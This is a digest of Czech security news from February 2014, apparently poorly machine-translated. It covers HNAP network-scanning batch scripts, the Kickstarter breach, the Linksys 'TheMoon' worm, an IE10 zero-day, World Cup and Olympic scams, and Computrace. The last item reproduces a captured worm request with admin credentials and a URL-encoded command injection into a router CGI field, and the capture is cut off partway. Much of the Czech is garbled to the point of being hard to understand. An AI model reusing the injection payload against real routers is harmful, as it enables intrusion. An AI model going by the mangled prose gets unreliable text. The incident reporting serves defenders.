, pokud errorlevel == 1 goto endend
echo Hostitel% 1 HNAP povoleno
: endend

Zabalte to až do FOR / L smyčky "chknet.cmd" naskenovat / 24 subnet:

@ Echo off
REM Syntaxe: chknet.cmd sub.net.address (3 oktety pouze)
echo skenování Síťové% 1,0
k / L%% G IN (1,1,254) DO volejte chkhost% 1%% G.

Spuštěním Najdete zde vše o tomto síti (můj test sítě jen má jeden router jsme se hrát s):

C: \> chknet 192.168.1
Skenování sítě 192.168.1.0
hostitele 192.168.1.1 se HNAP povolen

Ale to je dost hrubá metoda, a to trvá docela dlouho, než pro / 24 podsíti. Existuje jednoduchý nástroj, který bude dělat svou práci? Byl jsem velmi překvapen, když zjistil, že tam nebyl NMAP NSE skript na to .. Nicméně Nessus má mít plugin pro identifikaci HNAP služeb podle Service Detection / HNAP detekce (sahající až do dubna 2011 - http://www.tenable.com/blog/plugin-spotlights-new-nessus-os-identification-plugins )

Jako vždy, na paměti, že skenování infrastrukturu, kterou nevlastníte bez předchozího písemného souhlasu je nezákonné. Tyto metody mají pomoci skenování sítě, které vlastníte a máte oprávnění ke skenování - domácí síť nebo síť v práci například (na vědomí, že stále vyžadují povolení prohledat váš pracovní síť).


Kickstarter přiznal odcizení dat zákazníků

17.2.2014 Kriminalita
Jedna z nejznámějších crowdfundingových služeb oznámila, že kyberzločinci získali uživatelská jména, adresy, telefonní čísla a šifrovaná hesla registrovaných uživatelů.

Službu na pořádání finančních sbírek od jednotlivců používají miliony lidí k získání kapitálu na realizaci kreativních projektů nebo zakládání firem. Představitelé společnosti v sobotu připustili, že se útočníci dostali k části dat o uživatelích, ale že chyba, kterou zneužili, už byla opravena, a k dalším ztrátám dat by tedy již docházet nemělo.

Odcizená hesla jsou sice zašifrovaná, podle oficiálního upozornění je ale může dešifrovat kdokoli s dostatečnými znalostmi a výpočetním výkonem. Kickstarter proto všem uživatelům doporučuje svá hesla změnit. A pro jistotu samozřejmě i ve všech dalších účtech, kde používají stejnou kombinaci přístupového jména a hesla.

Orgány činné v trestním řízení přitom organizaci na únik upozornily již ve středu.

Generální ředitel společnosti Yancey Strickler napsal na oficiální blog: „Útočníci nezískali žádné údaje o platebních kartách. Nemáme žádný důkaz o jakékoli neoprávněné aktivitě s výjimkou dvou účtů Kickstarteru.“ Dodává také, že u nich nebyly uloženy údaje o platebních kartách.

Společnost oznámila, že v posledních dnech posílila zabezpečení a že spolupracuje s orgány činnými v trestním řízení na odhalení pachatelů.

Kickstarter zahájil činnost v roce 2009 jako platforma pro financování různých projektů jako nezávislých filmů, uměleckých vystoupení, počítačových her nebo otvírání restaurací. Dobrovolníci, které vybranému projektu poskytnou své finanční prostředky, často na oplátku dostávají různé ceny, upomínkové předměty, slevy, vstupenky, kredity nebo první exempláře vyvíjených výrobků.

Za necelých 5 let se již tímto způsobem podařilo financovat přes 100 000 projektů v celkové hodnotě dosahující stovek milionů dolarů.


Měsíční červ infikuje směrovače Linksys

17.2.2014 Viry
Množící se červ nazvaný „The Moon“ napadá směrovače Linkys díky zranitelnosti umožňující obejití ověření.

Podle varování, které ve středu vydalo výzkumné středisko ISC (Internet Storm Center), bylo zaznamenáno nekorektní chování směrovačů Linksys řady E1000 a E1200, které prohledávaly okolní adresy IP na otevřené porty 80 a 8080. O den později ISC potvrdilo, že dané modely mohou být napadeny a že se mu podařilo odchytit aktivního červa pomocí svého honeypotu – úmyslně nechráněnému systému fungujícímu jako vábnička.

Útoky jsou výsledkem červa – sebereplikujícího programu, který napadá systém směrovačů Linksys, které pak používá ke skenování internetu a hledání dalších zranitelných zařízení. Podle Johannese Ullricha, vedoucího technologického pracovníka ISC, prozatím není k dispozici přesný seznam všech zranitelných modelů, ale v závislosti na verzi firmwaru mezi nimi určitě jsou E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000 a E900.

Červ byl pojmenován „The Moon“ protože obsahuje logo Lunar Industrie, fiktivní společnosti z filmu „The Moon“. Jeho útok začíná zadáním adresy URL s příkazy protokolu HNAP (Home Network Administration Protocol), který byl vyvinut společností Cisco a který umožňuje identifikaci, konfiguraci a správu síťových zařízení. The Moon pomocí příkazů HNAP zjistí přesnou verzi modelu a firmwaru daného směrovače a pokud je zařízení zranitelné, pomocí konkrétního skriptu CGI spustí lokální proces.

Název používaného skriptu CGI nebyl uveřejněn, protože umožňuje obejít ověřování. Červ odesílá náhodné přihlašovací údaje, protože je skript vůbec neověřuje a automaticky uznává administrátorská práva klienta. Následuje stažení a spuštění binárního souboru formátu ELF (Executable and Linkable), zkompilovaného pro platformu procesorů MIPS. Kód v souboru obsažený potom prohledává adresy IP na další zařízení a spustí na směrovači server HTTP, ze kterého jsou kopie červa distribuovány na další cíle.

Prozatím není jasné, jaký úkol má malware plnit, některé řetězce v kódu ale naznačují existenci řídícího serveru, který by mohl vznikající botnet ovládat podle nějaké konkrétní strategie. Co se týče obranné strategie, vypnutí vzdálené správy zřejmě u většiny zařízení nebude připadat v úvahu, stejně jako omezení přístupu ke správcovskému rozhraní pouze na ověřenou množinu adres IP. Pro danou verzi červa ovšem stačí změnit číslo portu rozhraní mimo výchozí 80 a 8080, i když samozřejmě nějaká nová verze červa může snadno hledat i na jiných portech. To ovšem na druhé straně znamená více pokusů a větší aktivitu v síti, kterou lze relativně snadno identifikovat.

Firma Linksys, kterou nedávno zakoupila společnost Belkin, si je podle svého mluvčího vědoma zranitelnosti některých řad svých směrovačů a pracuje na novém firmwaru, který by měl chybu odstranit.


FireEye zprávy IE 10 zero-day používán v zalévání otvorů útoku

15.2.2014 Zranitelnosti

Dobří lidé FireEye Labs zanecháno objevu IE 10 zero-day používán v zavlažování díra útoku na porušené serveru ve Spojených státech [1].

FireEye pracujeme spolu s Microsoftem, takže detaily jsou poměrně tenké . Chcete-li citovat ze svého prvního krátkého blogu:

"Je to zbrusu nový zero-day, který se zaměřuje IE 10 uživatelů navštěvující ohrožena webové stránky-klasický drive-by download útoku. Po úspěšném využití, to zero-day attack stáhne XOR kódovaný náklad ze vzdáleného serveru, dekódování a spustit jej . "

Ti, kteří hledají po IE 10 uživatelů chtít dávat pozor na jejich protokoly serveru proxy pro následné na stažení jako potenciální ukazatel.

UPDATE

FireEye poskytly velké množství detailů o útoku ve druhém blogu, který je dobře stojí za přečtení, a dává spoustu ukazatelů kompromisu projet protokolech a filtry:

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

[1] http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html


Skenování činnost pro / Siemens / bootstrapping / JnlpBrowser / rozvoj /
15.2.2014 Bezpečnost

Jeden z našich karet, Mike, napsal s některými neobvyklými hity ve svých internetových protokolů pro / Siemens / bootstrapping / JnlpBrowser / rozvoj / HTTP/1.1, který se zamyšleně sdílené.

První test byl osamělý skenování na 12. února 2014, a poté následovalo tři nové prověřování na 13 únoru 2014.

Skenování IP adresa 194.95.72.110 má název hostitele fb02itsscan.fh-muenster.de, rychlý pohled se zobrazuje webové stránky a webové stránky nabízí toto srdečné přivítání: Vítejte na Univerzitě aplikovaných věd v Münsteru

Takže potenciálně další akademická "studie", který prohledává internet. Každý, kdo má informace o tom, jaké mohou být hledali, nebo v případě, že je připojen k legitimní studie?


Světový pohár: spammeři se zaměřily na branku
15.2.2014 Spam

2014 vidí dvě velké sportovní akce, které se konají: Mistrovství světa ve fotbale v Brazílii a zimní olympijské hry v Soči. V listopadu jsme se zmínili o mailing Využití Světový pohár - podvodníci maskovat svůj podvod jako loterie. V lednu došlo ke zvýšení počtu těchto druhů zásilek. Příběhy používané ve zprávách byly totožné: uživatel byl informován, že on / ona byla vybrána z řad miliony dalších uživatelů jako vítěz loterie s obrovskou cenu. Aby bylo možné žádat o peníze, uživatel měl kontaktovat organizátory pomocí adresy a telefonní čísla poskytovány.

Tělo zprávy je buď prázdný nebo obsahoval jen jedna věta: "Viz přílohu k informacím" nebo "Otevřete přílohu". Obsah přiloženého souboru změněn od zprávy zprávy, stejně jako formát souborů - JPEG, PDF nebo DOC. Soubor obsahoval informace o údajné výhře údajně i měl odkazy na FIFA a mistrovství světa. Podvodníci dokonce šel do problému, včetně oficiální loga a obrázky z obřadu, kdy byla Brazílie získal na mistrovství světa.

Na konci ledna jsme také zjistil mailing s nebezpečnými přílohami, které využívaných na mistrovství světa téma 2014. V falešné dopisy zaslané jménem webu copa2014.gob.br, oficiální kontaktní kanálu brazilské vlády pro akce FIFA, příjemce byl blahopřál k vítězství dvě vstupenky na mistrovství světa. Chcete-li tisknout lístky pryč, uživatel musel kliknout na odkaz ve zprávě. Pokud uživatel spadl na podvod, Trojan-Downloader objevil na zařízení uživatele, které se pak stáhli Worm.VBS.Dinihou.

Červ je nejen slouží ke stažení a spuštění neznámých souborů bez oznámení, ale napadá i připojených USB flash disky. Chcete-li, aby se e-maily se objeví autentičtější podvodníci používají loga Světového poháru a používá to, co se zdá být skutečné adresa v poli odesílatele. Při bližším zkoumání se však, domény. Com se používá a není. Gov, což znamená, že je falešný.

Naši kolegové z Brazílie našli stejné phishing maily. Podvodníci nabídl volné vstupenky na mistrovství světa, svobodné cestování do Brazílie a jiných "dary". Cílem zločinců bylo ukrást osobní údaje uživatele, včetně údajů o jeho / její kreditní karty.

Malé a střední podniky také inzeroval své služby pomocí motivu mistrovství světa, zasílání nabídek pro cut-ceny mobilních služeb v Brazílii.

Čínské továrny nabízeny také případy smartphone s erby světově proslulých fotbalových klubů.

Spammeři využívají významné mezinárodní události z různých důvodů, od jednoduché reklamy vydírat peníze a krást osobní údaje. To je důvod, proč je důležité dávat pozor na e-maily od lidí, které neznáte. Zprávy o tom, že jste vyhráli v loterii nebo nějaké drahé vstupenky jsou s největší pravděpodobností bude po své peníze, nebo se snaží infikovat váš přístroj.


Mobilní podvodníci zaměřují sportovní fanoušky
15.2.2014 Mobil

Olympijské hry jsou obrovská událost. A podvodníci se zřejmě bude snažit využít jejich zájmu. Už jsme psali o "olympijské" spam pošty. Nyní, SMS spammeři se také objevil na scéně.

10. února jsme zaznamenali spam pošty, který údajně vedl k live stream olympijské události:

«Olympic live stream v Soči hxxp :/ / mms **** .ru / olympic.apk»

Pokud se nic netušící uživatel klikne na odkaz, bude Trojan stahovat do jejich zařízení. My odhalit Trojan v otázce, HEUR: Trojan-SMS.AndroidOS.FakeInst.fb.

Pokud je tato Trojan úspěšně stáhne a čluny, se zabývá serveru C & C a přenáší údaje shromážděné na telefonu uživatele, včetně seznamu kontaktů.

Poté se škodlivý program obdrží příkaz poslat SMS zprávu.

Zpráva je odeslána do jedné z největších bank v Rusku a obsahuje textové Balans. Pokud uživatel je klientem banky a používá mobilní bankovní služby, obdrží zprávu s informací o jeho zůstatku na účtu.

Trojan zachytí všechny zprávy a odešle je na server Scammer je. Jako výsledek, trestní skončí s informacemi o bankovním účtu oběti.

Banka terčem útoku nebyl vybrán náhodně - nabízí svým klientům možnost dobití mobilního telefonu účtu z bankovní karty. Tato služba vyžaduje, aby uživatel poslat určitý typ textové zprávy na číslo banky.

Po obdržení příkazů, Trojan odešle textovou zprávu na číslo banky a peníze jsou převedeny z účtu uživatele na účet infikovaného telefonu.

Peníze jsou pak převedeny z telefonu na účty, které patří do podvodníky.

Trojan je ukrást až 10 000 rublů (přibližně 285 dolarů) za den, zatímco všechny zprávy o převody budou skryta od uživatele.

Sociální inženýrství je vždy představuje nebezpečí. Uživatelé by měli být obzvláště opatrní při významných světových událostí. Přinejmenším, vyhnout se kliknutím na odkazy odeslané ve zprávách lidmi, které neznáte. Vždycky je tu riziko, že budete spadnout do pasti a ztratit docela dost peněz.

Aby se minimalizovalo riziko, že budou infikovány mobilní malware, doporučujeme následující:

Nevypínejte režim dodavatele na mobilních zařízeních
Nepoužívejte flag pole "instalovat aplikace z neznámých zdrojů"
Instalujte pouze aplikace z oficiálních kanálů (Google Play, Amazon Store, atd.)
Věnujte pozornost právům požadovaných aplikací během instalace
Pokud soubor požadovaných práv oprávnění neodpovídá určené funkce aplikace, je (např. žádostí hra povolení odesílat SMS zprávy), neinstalujte aplikace
Používejte bezpečnostní software


Absolute Computrace: Často kladené otázky
15.2.2014 IT

V reakci na četné žádosti o komentáře a vysvětlení po naší prezentace na Analyst Summit 2014 Kaspersky Security , vytvořili jsme tuto dotazy některé odpovědi na nejčastěji kladené otázky.

1.. Proč jste se rozhodli rozšířit tento výzkum po prezentaci o Absolute Computrace v roce 2009?
Kaspersky Lab se rozhodl provést úplnou výzkum na toto téma poté, co objevil několik soukromě vlastněné notebooky Kaspersky Lab Bezpečnostní výzkumníci měli Computrace Agent běží bez předchozího povolení. Takové neautorizované aktivace rychle se stal alarmující, když naše reverzní inženýrství odhalila závažné zranitelnosti v Computrace Agent protokolu designu.

Absolute Software Tisková zpráva z roku 2009 tvrdí, že "modulu Computrace BIOS je aktivována při instalaci Absolute Software ze strany našich zákazníků, a nikdy vnuceny jakéhokoliv uživatele. Computrace je navržen tak, aby se aktivuje, deaktivuje, kontrolovány a řízeny zákazníkem pomocí kódovaných kanálů. "

Nicméně, jsme našli stopy nepovolených aktivací na našem hardware. Náš výzkum práce ukazuje, že skutečné verze Computrace Agent nadále používat nešifrované kanály. Vzhledem k této skutečnosti jsme byli schopni provést živé demo na únosu z Computrace Agent na SAS 2014 konferenci.

2. Měli byste se obrátit Absolute Computrace před provedením výzkumu veřejnost?
Oznámený jsme Absolutní software prostřednictvím e-mailu a připojené celého výzkumného papíru návrhu. Zde je screenshot z e-mailové zprávy zaslané na Absolute Software 3. února 2014

Později ten den, kdy jsme obdrželi automatický e-mail z poštovního serveru Absolute Software: "Dodávka se nepodařilo těmto příjemcům nebo distribučním seznamům: security@absolute.com"

Tam byly žádné další chybové zprávy, která znamená, že e-mail by mělo dosáhnout absolutní Software na jiné adresy v seznamu, ale nikdy jsme obdrželi formální odpověď.

3. Jak nedávno byl Computrace Agent variantu budete analyzovat?
Analyzovali jsme několik spustitelných souborů a notebooků v průběhu tohoto výzkumu. Analyzované notebooky jsou zbrusu nové, zakoupené v roce 2012 s top konfigurace jsou k dispozici na trhu, podle majitelů notebooků.

Varianta Computrace Agent jsme použili v našem živém demu byl sestaven v roce 2012:

4. Jak mohu zjistit Computrace v systému?
Nejjednodušší a nejúčinnější způsob, jak je hledat rpcnet.exe proces ve Správci úloh nebo soubor se stejným názvem v adresáři C: \ Windows \ System32 \ adresáře. Pokud nalezeno - jste Computrace aktivován. Pro delší seznam Computrace Agent činnosti naleznete v části Dodatek A naší výzkumné práce.

5. V případě, že uživatelé bez Windows obávat neautorizovaných aktivací Computrace?
Jak nyní, nejsme vědomi EFI firmwaru nebo systému BIOS Volitelné ROMy, které mají spustitelné soubory pro platformy než Windows, což znamená, že agent s krycím nebude nainstalován na oblasti non-Windows. Podrobnosti o tom, jak je agent nainstalován z BIOSu naleznete naši kompletní výzkum papír

6.. Má problémy se zabezpečením Computrace ovlivnit platformy než Windows?
Náš výzkum ukazuje, bezpečnostní chybu v Computrace Agent protokolu designu, což znamená, že teoreticky všechny prostředky na libovolné platformě, může být ovlivněna. Nicméně, jsme potvrdili pouze zranitelnost v agenta Windows.

Jsme si vědomi Computrace produktů pro Mac OS X a Android tablet. Nicméně, my jsme analyzovali protokoly, které používají.


Závažná zero day chyba v Internet Exploreru 10

14.2.2014 Zranitelnosti
Společnost FireEye upozorňuje na to, že útočníci začali aktivně zneužívat zero day zranitelnost v Microsoft Internet Exploreru 10.

Microsoft problém uznal, způsob řešení ale zatím oznámen nebyl. Poslední pravidelná dávka bezpečnostních záplat Microsoftu byla totiž vydána před pouhými 3 dny (únorová sada bulletinů zabezpečení, jako vždy 2. úterý v měsíci). V samotném Internet Exploreru tento balíček opravoval 24 zranitelností, z nichž 15 se týkalo i verze MSIE 10.

FireEye uvádí, že stávající chyba je kritická, protože k instalaci malwaru stačí pouze navštívit podvodný web, uživatel nemusí provádět žádnou další akci (tzv. útok drive-by download) a ze vzdáleného serveru se automaticky stáhne a začne instalovat malware. Použitý exploit dokáže pomocí skriptu v jazyce Flash ActionScript obejít i ochranu ASLR (address space layout randomization, znáhodnění adresního prostoru) ve Windows.

Podíl uživatelů Internet Exploreru 10 po vydání verze 11 klesá, statisticky společnosti Net Applications ale stále uvádějí, že ho má asi 16 % všech uživatelů MSIE (s 37% podílem převažuje verze 8, která je jako poslední k dispozici pro Windows XP).


Facebook chyba brání zrušení app oprávnění
13.2.2014 Sociální sítě

Vývojáři pracující pro MyPermissions dodavatelů soukromí software tvrdí, že objevili kritickou zranitelnost ve Facebooku kódu. chyba může být zneužita, aby bylo možné pro uživatele zrušit oprávnění uvedené na aplikaci nebo jej odstranit pomocí svých mobilních aplikací Facebook. Uživatelé, kteří se pokusí to se potýkají s chybové obrazovky a zabránit pokračování procesu:

"Skoro každý s trochou technického know-how by, aby to pro vás nemožné odvolat souhlas app, aby přístup k informacím," společnost poukázal . chyba se týká pouze mobilní aplikace Facebooku, takže výše uvedené změny mohou být provedeny přes desktop verzi webu. ale pokud vezmete v úvahu skutečnost, že téměř polovina uživatelů sociální sítě jsou to přístupem výhradně prostřednictvím svých mobilních telefonů, můžete vidět, proč to může být problém. Společnost upozornila Facebook, aby existence vady, a jsou zřejmě již pracuje na opravě.


Mobilita je nejslabší zabezpečení odkaz
13.2.2014 Mobil

Geodetické více než 750 rozhodovací zabezpečení tvůrci a odborníky z praxe, CyberEdge Group zpráva zjistila, že více než 60 procent bylo porušeno v roce 2013 čtvrtina všech účastníků s odkazem na nedostatek investic zaměstnavatele v adekvátní ochrany. Klíčová zjištění patří: zájem o mobilní zařízení. Účastníci byli požádáni, aby sazby - na stupnici od 1 do 5, kde 5 je nejvyšší - schopnost jejich organizace na obranu kybernetickým hrozbám přes devět IT domény. Mobilní zařízení (2.77) obdržel nejnižší známky, následuje notebooky (2,92) a aplikacím pro sociální média (2,93). Virtuální servery (3.64) a fyzické servery (3.63) byly považovány za nejbezpečnější. The BYOD invaze. Od roku 2016, 77 procent v reakci organizací ukazují, že budou mít politiky BYOD na místě. 31 procent již zavedly politiky BYOD, bude 26 procent následovat do 12 měsíců, a dalších 20 procent bude následovat během dvou let. Nepřiměřené investice do zabezpečení. Ačkoli 89 procent z bezpečnostních IT rozpočtů respondentů roste (48 procent), nebo drží stabilní (41 procent), jeden ze čtyř pochybnosti, zda jejich zaměstnavatel investoval dostatečně v kybernetické obrany hrozeb. Lepší zabezpečení, nebo zbožné přání? Přestože 60 procent dotázaných se přiznala k ovlivnění úspěšný kybernetický útok v roce 2013, pouze 40 procent očekávají, že obětí znovu 2014. Next-gen firewally na vzestupu. z 19 určených pro zabezpečení sítě technologií, firewallů příští generace (29%) jsou nejčastěji citován pro budoucí akvizice, následuje analýza chování sítě (26%) a velkých analýzy bezpečnostních dat (24 %). Malware a phishing způsobit bolest hlavy. Z osmi určených kategoriích kybernetických hrozeb, malware a phishing / spear-phishing jsou top mysli a představují největší hrozbu pro reakci organizace. Denial-of-Service (DoS) útoky jsou nejmenší obavy. Nevědomost je sladká. Méně než polovina (48 procent) dotazovaných organizací provádět kompletní síťové skenování aktivní zranitelnosti častěji než jednou za čtvrt roku, zatímco 21 procent provádět pouze jim ročně. Nespokojenost s koncovými obrany. Více než polovina respondentů uvedla svůj záměr posoudit alternativní koncových anti-malware řešení buď rozšířit (34 procent), nebo nahradit (22 procent) jejich stávající software pro ochranu koncových bodů. Careless zaměstnanci jsou na vině. Když se zeptal, které faktory brání zabezpečení IT organizace z dostatečně bránit kybernetickým hrozbám, "nízký povědomí o bezpečnosti mezi zaměstnanci" byl nejčastěji citován, těsně před "nedostatek rozpočtu."


Co si bezpečnostní profesionálové vládní myslíte?
13.2.2014 Bezpečnost

Tripwire a vláda Technology Research Alliance (GTRA) vyhlášeny výsledky kybernetické průzkumu americká vláda, která hodnotila postoje a odezvy 111 bezpečnosti a shody odborníků z US vládních agentur a dodavatelů. "Cybersecurity i nadále jednou z hlavních priorit senior manažeři ve federální vládě, "řekl Ron Ross, pracovník v Národním institutu pro standardy a technologie (NIST). ". Studie, jako je tento, spojit důležité datové body, které vám pomohou s rozhodovací pravomocí posoudit trendy a podílet se na probíhajícím dialogu, který nám pomůže sestavit efektivní řešení pro naše obtížných a náročných problémů kybernetické bezpečnosti" Klíčová zjištění patří:

60 procent věří, že nový rámec NIST zlepší bezpečnost.
55 procent věří, že bezpečnost IT vláda zlepšila v důsledku politiky Bushovy administrativy.
46 procent tvrdí, že viděli snížení rizika v důsledku pokračujícího úsilí sledování.
43 procent z bezpečnosti IT a zaměstnanci shody v úvahu špatnou správu věcí veřejných a dysfunkční kongres "největší bezpečnostní hrozba čelíme."
45 procent respondentů věří, že financování je největším problémem jejich organizace čelí při úspěšném provádění kybernetické programů, pouze 37 procent věří, že mají dostatečné prostředky k řádnému provádění politiky, a když se zeptal, co federální bezpečnostní lídři by měli dělat pro připojení bezpečnosti agentuře poslání, druhá nejpopulárnější odpověď byla "více peněz."
Bere na vědomí, Dwayne Melancon, technologický ředitel společnosti Tripwire: "Je povzbudivé, že bezpečnostní vláda a dodržování profesionálové vidí výhody kontinuální sledování a že jsou optimističtí ohledně budoucího zlepšení prostřednictvím nového rámce NIST však, že výsledky průzkumu zdůrazňují skutečnost, že omezení zdrojů jsou významným inhibitorem silnější zabezpečení ". Melancon pokračoval: "Bohužel se zdá, že agentury stále obávají auditor více než protivník. Jejich největší starostí je stále vyhovující, a zároveň dodržování může pomoci zlepšit zabezpečení, to není nejvýznamnější hrozbu pro dosažení poslání pro většinu organizací.


Trendy v oblasti bezpečnosti webových aplikací
13.2.2014 Bezpečnost

Přes webové aplikace prodejci jsou vstřícnější a uvolnění bezpečnostní záplaty mnohem rychlejší než v roce 2012, nový výzkum ukázal, že je stále přijímá v průměru přes dva týdny pro kritické zranitelnosti, které mají být opraveny. Průměr propojovacích časy v roce 2013 oproti roku 2012:

Ilia Kolochenko, generální ředitel společnosti High-Tech mostu, řekl: "11 dnů na opravu kritické zranitelnosti je ještě poměrně dlouhá prodleva. Ale, naštěstí, i když vážné zranitelnosti jsou stále složitější odhalit a využít, existují dodavatelé, jako například BigTree CMS, kteří reagují na to i komplexní zabezpečení v méně než tři hodiny, takže naše ocenění pro nejcitlivější dodavatel roku 2013 pokračuje k této organizaci. Obecné povědomí ve dodavatelů o důležitosti zabezpečení aplikací je také roste s prodejci konečně brát bezpečnost vážně. V minulosti, dokonce i dobře známých výrobců odloženo související s bezpečností opravy ve prospěch uvolnění nové verze svého softwaru s novými funkcemi a neopravených zranitelností. Nicméně, v roce 2013, žádný velký prodejce přijala tento nebezpečný přístup upřednostňování funkčnosti při obětování bezpečnosti a pouze tři z 62 bezpečnostních rad vydaných u nás v roce 2013 zůstal unpatched. " Navzdory lepším kódovacích praktik dělat vážné zranitelnosti ve vyspělých aplikací těžší najít, výzkumných také celou řadu případů, kdy byla bezpečnostní aplikace postižena základních chyb, jako je nedostatek odstranit instalační skripty, což umožňuje počítačoví zločinci kompromitovat celou webovou aplikaci. To podtrhuje důležitý nezávislého testování bezpečnosti a auditů webových aplikací, jako i profesionální vývojáře může prostě vynechat nebo zapomenout na kontrolu životně důležité bezpečnostní body. Kritické a vysoce rizikových zranitelností jsou stále důmyslnější jak rozpoznat a využít. Pryč jsou dny, kdy se mnoho PHP aplikací běžně používá "exec ()" nebo "průchozí ()" funkce s uživatelem zadané vstupy, které vedou ke vzdálenému spuštění kódu. Závažné zranitelnosti jsou nyní využitelné přes zřetězené útoků a dobrých příkladů, které ilustrují to jsou Vzdálené spuštění kódu v Microweber a OS Command Injection v CosCms. SQL injekce zranitelnosti jsou také stále složitější využívat. Účinné DNS exfiltrace technika je nyní běžně používá v případech, které v minulosti byly považovány za téměř unexploitable k extrakci dat z databáze. Je také důležité zmínit, že mnohé z těchto chyb zabezpečení se obvykle považují za vysokou nebo kritickou riziko bylo sníženo na střední riziko v našich rad v roce 2013, protože jejich využití vyžaduje, aby útočník být ověřen nebo přihlášené. . To potvrzuje, že weboví vývojáři by měli také věnovat pozornost zabezpečení částech žádosti, které jsou přístupné pouze na "důvěryhodných" osob, které se mohou ve skutečnosti být docela nepřátelský " Nejzranitelnější webové aplikace jsou:

In-house webová aplikace, na 40 procent
Pluginy a moduly CMS, na 30 procent
Malé CMS, na 25 procent
Velký CMS, jako je WordPress a Joomla), na 5 procent.
Marsel Nizamutdinov, vedoucí výzkumu v High-Tech mostu, dospěl k závěru: "Je důležité říci, že asi 90 procent velkých a středně velké komerční a open-source CMS náchylné k XSS a SQL injection útoky jsou zranitelné, protože nejsou up-to-data, nebo jsou nesprávně nakonfigurovány. Nicméně, jsme udělali velký pokrok, pokud jde o pozitivním dopadu náš výzkum přináší do průmyslu, s desítkami tisíc populárních internetových stránek již při riziku ohrožení díky našemu úsilí a spolupráci s dodavateli softwaru.


Microsoft, aby se příští Patch Tuesday světlo
13.2.2014 Zranitelnosti

Microsoft pokračuje v trendu, že začal minulý měsíc, jak udržet Patch Tuesday poměrně lehký. Existuje pouze pět návěstí tento měsíc -. Dvě kritické, tři důležité dva kritické informační zprávy jsou neobvyklé v tom, že se nedotýkaly starší verze systému Windows nebo Internet Explorer. První záplaty vzdálené spuštění kódu, který ovlivňuje Windows 7 až po Windows 8.1, včetně 8.1 RT. Druhý, rovněž vzdálené spuštění kódu, je vlastně otázkou Forefront Protection for Exchange Server (2010). Vzhledem k tomu, umožňující vzdálené spuštění kódu v obvodové služby, jako Forefront, musel bych říci, že je to nejvyšší otázka tato priorita záplatování měsíc. Druhá je, není divu, kritická ve Windows 7 a později. Ostatní tři otázky jsou všechny nižší riziko a pravděpodobně nižší exploitability, od zveřejňování informací na odmítnutí služby a zvýšení úrovně oprávnění. Nesmí být ignorovány, ale měla by být poněkud menší obavy než dálkové kritické zranitelnosti. Autor: Ross Barrett, Senior Manager, bezpečnostní inženýrství, Rapid7.


99,4% spamu zablokována v nedávném testu Virus Bulletinu
13.2.2014 Spam

Virus Bulletin oznámila výsledky svého nejnovějšího anti-spam srovnávací hodnocení: všech 18 řešení, které byly testovány byly nalezeny blokovat nejméně 99,4% veškeré nevyžádané pošty - i když někteří bojovali s falešně pozitivní záležitostí.

. Se VBSpam testy nejsou jen podívat na "schopnost, aby se zabránilo spamu v tom, aby ji uživatelů produktů schránek, ale také měří, jak dobře produktů provést, pokud jde o to blokuje legitimní e-maily Tam, výsledky byly spíše smíšené vaku: pět řešení ani blokovat žádné legitimní e-maily vůbec - a jak se také blokována více než 99,5% veškeré nevyžádané pošty, které byly uděleny v VBSpam + ocenění. Nicméně, pro tři řešení, množství legitimní e-mail, že zablokoval byla tak vysoká, že se jim nepodařilo dosáhnout certifikace VBSpam. "Byl jsem opravdu rád, takové ceny odlovu vysoké spam," řekl Anti-Spam test ředitel VB, Martijn Grooten. ".. Stále existují miliardy nevyžádaných e-mailů každý den poslal, z nichž mnozí přicházejí s nebezpečným nákladem Je dobré vědět, že téměř všechny z nich jsou zastaveny dříve, než se dostanou do složky Doručená pošta uživatele" Grooten pokračoval: "Samozřejmě, že to bylo zklamáním vidět, že u některých výrobků, vysoká míra úlovek přišli za cenu blokování docela málo legitimní e-maily. Doufáme, že tyto produkty budou vidět jejich výkon zlepšit v dalším testu. " Zpráva také průzkum využívání účastníků z DMARC. DMARC je specifikace určena k zabránění zneužití e-mailu: umožňuje majitelé často zfalšovaných domén, jaké přijímače dělat s e-maily, které nejsou SPF a DKIM kontroly. Zatímco většina zúčastněných produktů zkontrolovat stav SPF a DKIM podpis příchozích e-mailů , v současné době velmi málo využívají DMARC: pouze jeden ze 18 produktů posílá zpětnou vazbu, zatímco jiný kontroluje stav DMARC příchozích e-mailů, ale neodešle zpětnou vazbu.


Linksys Worm ("TheMoon") Zajatý

13.2.2014 Viry

Jedna důležitá aktualizace: Toto ovlivní další směrovače Linksys stejně. Například, my nějaké směrovače conecting na honeypot kteří se identifikují jako E2500 (Firmware 1.0.03 build 4)

Nakonec naše honeypot to něco, co vypadá, že je zodpovědný za skenování činnost vidíme zachytit:

Původní žádost, jak je popsáno výše, je:

GET / HNAP1 / HTTP/1.1
Host: [ip hostitele]: 8080

Další požadavek je místo, kde to začíná být zajímavé:

POST / [odepřena]. Cgi HTTP/1.1
Host: [IP honeypot]: 8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Mac_PowerPC)
Přijmout: text / html, application / xhtml + xml, application / xml; q = 0,9, * / *, q = 0,8
Accept-Language: en-US, en, q = 0,5
Accept-Encoding: gzip, deflaci
Referer: http:// [IP honeypot]: 8080 /
Autorizace: Základní YWRtaW46JmkxKkBVJDZ4dmNH <- uživatelské jméno: admin heslo: & i1 * @ U $ 6xvcG
(Stále snaží přijít na význam tohoto hesla)
Připojení: keep-alive
Content-Type: application / x-www-form-urlencoded
Content-Length: 518

% 73% 75% 62% 6d% 69% 74% 5f% 62% 75% 74% 74% 6f% 6e% 3d &% 63% 68% 61% 6e% 67% 65% 5f% 61% 63
% 74% 69% 6f% 6e% 3d &% 73% 75% 62% 6d% 69% 74% 5f% 74% 79% 70% 65% 3d &% 61% 63% 74% 69% 6f
% 6e% 3d &% 63% 6f% 6d% 6d% 69% 74% 3d% 30 &% 74% 74% 63% 70% 5f% 6e% 75% 6d% 3d% 32 &% 74% 74
% 63% 70% 5f% 73% 69% 7a% 65% 3d% 32 &% 74% 74% 63% 70% 5f% 69% 70% 3d% 2d% 68% 20% 60% 63
% 64% 20% 2f% 74% 6d% 70% 3b% 69% 66% 20% 5b% 20% 21% 20% 2d% 65% 20% 2e% 4c% 32% 36% 20
